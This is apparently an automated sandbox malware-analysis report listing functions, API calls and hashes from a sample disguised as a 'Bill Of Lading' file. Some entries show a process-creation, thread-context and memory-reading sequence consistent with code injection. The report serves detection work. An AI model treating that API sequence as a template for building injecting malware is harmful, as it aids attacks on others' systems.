                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ByteCharMultiWide$_memset_strcat_strlen_wcslen
                                                                                                                      • String ID: HH
                                                                                                                      • API String ID: 1194219731-2761332787
                                                                                                                      • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                      • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                                                                      • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                                                                      • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                                                                      Function 040216A8 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 04021E63
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04021EF9
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04021F1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                      • Instruction ID: 736eecee7dda230a2b8a3689ab7a8c9de904454b8b416e12eb28b7fcfbeff471
                                                                                                                      • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                                                                                                                      • Instruction Fuzzy Hash: BA62FB30A142189BEB24CFA4C940BDEB376EF58300F1091A9D50DFB2D4E77A9E85CB59
                                                                                                                      Function 0040E1E0 Relevance: 6.1, APIs: 4, Instructions: 82windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0040E202
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconNotifyShell__memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 928536360-0
                                                                                                                      • Opcode ID: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                      • Instruction ID: 9c6d99eda8392314e00a4319cd3b9f491a6d528882fc0aac3328a2d60ab56ec1
                                                                                                                      • Opcode Fuzzy Hash: 27b28fb85d639681eb8fd2a3c2bcd9dc0bb82ef5f5c365fc5a47124cd6911170
                                                                                                                      • Instruction Fuzzy Hash: FC318170608701DFD320DF25D845B97BBF8BB45304F00486EE99A93380E778A958CF5A
                                                                                                                      Function 0041171A Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                        • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                        • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1411284514-0
                                                                                                                      • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                      • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                                                                      • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                                                                      • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                                                                      Function 004734B7 Relevance: 4.7, APIs: 3, Instructions: 234COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                      • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                                                                      • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                                                                      • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                                                                      Function 0040F110 Relevance: 4.5, APIs: 3, Instructions: 32registryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                                                                      • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3677997916-0
                                                                                                                      • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                      • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                                                                      • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                                                                      • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                                                                      Function 0043526E Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _malloc.LIBCMT ref: 00435278
                                                                                                                        • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                                                        • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                                                        • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                                                                      • _malloc.LIBCMT ref: 00435288
                                                                                                                      • _malloc.LIBCMT ref: 00435298
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 680241177-0
                                                                                                                      • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                      • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                                                                      • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                                                                      • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                                                                      Function 00401B70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _wcslen.LIBCMT ref: 00401B71
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Exception@8Throw_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: @EXITCODE
                                                                                                                      • API String ID: 580348202-3436989551
                                                                                                                      • Opcode ID: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                      • Instruction ID: 288ad252d7dad0c090ff8240dee62855692e698d70424b42c0a66861a7771545
                                                                                                                      • Opcode Fuzzy Hash: 48d001a4b96ee351bc7679959485890c1c6d832d60c6cde5ea273d4c8ab31dfe
                                                                                                                      • Instruction Fuzzy Hash: 73F06DF2A002025BD7649B35DC0276776E4AB44704F18C83EE14AC7791F6BDE8829B15
                                                                                                                      Function 0040EFE0 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 823142352-0
                                                                                                                      • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                      • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                      • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                      • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                      Function 0041511A Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __lock_file_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 26237723-0
                                                                                                                      • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                      • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                      • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                      • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                      Function 00414E94 Relevance: 3.0, APIs: 2, Instructions: 39COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                        • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                      • __lock_file.LIBCMT ref: 00414EE4
                                                                                                                        • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                                                                      • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 717694121-0
                                                                                                                      • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                      • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                                                                      • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                                                                      • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                                                                      Function 040216A5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 04021E63
                                                                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04021EF9
                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04021F1B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1754566267.0000000004020000.00000040.00000020.00020000.00000000.sdmp, Offset: 04020000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4020000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2438371351-0
                                                                                                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                      • Instruction ID: 968394a7435154f5b5a6084f63864c3934e7fdd2b6ae6c101e109609fbf40d85
                                                                                                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                                                                      • Instruction Fuzzy Hash: C912EE24E14668C6EB24DF60D8507DEB232EF68300F1090E9910DEB7A4E77A5F85CF5A
                                                                                                                      Function 00410D40 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProtectVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 544645111-0
                                                                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                      • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                      Function 004092C0 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                      • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                      • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                      • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                      Function 00401108 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ProcWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 181713994-0
                                                                                                                      • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                      • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                      • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                      • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                      Function 0041AA31 Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHeap
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 10892065-0
                                                                                                                      • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                      • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                                                                      • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                                                                      • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                                                                      Function 00444343 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                      Download Yara Rule
